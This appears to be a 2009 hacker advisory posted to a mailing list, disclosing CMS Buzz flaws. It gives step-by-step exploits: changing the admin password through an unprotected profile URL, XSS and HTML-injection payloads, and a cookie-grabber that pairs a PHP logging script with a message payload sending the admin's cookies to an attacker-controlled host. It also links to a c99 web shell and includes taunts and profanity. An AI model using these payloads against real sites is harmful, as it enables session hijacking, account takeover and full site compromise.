CMS Buzz (XSS/PC/HI) Multiple Remote Vulnerabilities

Mon, 22 Jun 2009 07:26:10 -0700 

#################################################################################################################

[+] CMS Buzz (xss/Change Password)Multiple Remote Vulnerabilities

[+] Discovered By xhaxkerx

[+] Vendor: http://www.c99.mobi

[+] Note : If you are The S3r!0uS  I say To Fuck you Because You are Hacked  
Site Of My Best Friends dz-boys.com

[+] Demo:http://demo.cmsbuzz.com/

[+] Greeting : yasin

#################################################################################################################

Remote Changing Password:

+++++++++++++++++++++++++

1) You Must Register In ThE site http://www.victim.com/?action=register

2) Login

3) Go To url:

    http:///www.victim.com/?action=profile&user= [ Name Of user ]

Example

http:///www.victim.com/?action=profile&user=admin

Change admin Password Then go To login http://path/?action=login

Cross Site Scritping

++++++++++++++++++++

http://www.victim.com/?action=search

<script>alert("xss")</script>



#################################################################################################################

[+] CMS Buzz Cookie Grabber Exploit& HTML Injection

[+] Discovered By ThE g0bL!N

[+] Vendor:http://msbuzz.com/

[+] Fuck You The S3r!0uS

#################################################################################################################

PoC

--

[+] Make 2 files and upload to your host :

[+]cookie.php  - > Put in this File That Code:

 <?php

 $cookie = $_GET['cookie'];

 $log = fopen("log.txt", "a");

 fwrite($log, $cookie ."\n");

 fclose($log);

 ?>

[+]log.txt   - > CHMOD it 777 and put in the same directory with cookie.php

 

[+]Exploit:

   -------

1) Register in The SIte

2) Go to send message http://path/?action=compose

3)We Put in

  To:admin name

  Subject: Some Subject

  Message: <script>document.location 
="http://localhost/[path]/cookie.php?cookie="; + document.cookie;</script>

  The js code Worked When The admin Read The Message

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

2) HTML Injection

+++++++++++++++++

1) Register :p

2) Go to send message http://path/?action=compose

3)We Put in

  To:admin name

  Subject: Some Subject

  Message: 1)XSS:PoC :<script>alert("xss")</script>

             ---------

           2)Poc: Iframe :"><iframe src=http://www.google.com/></iframe>

       -------------

     3)PoC : Redirection:">"">>>><meta http-equiv="Refresh" 
content="0;url=http://www.google.com/";> ""

     -------------------

     DEMO:http://demo.cmsbuzz.com



# if you need shell http://www.c99.mobi/c99.txt



################################################################################################################

Reply via email to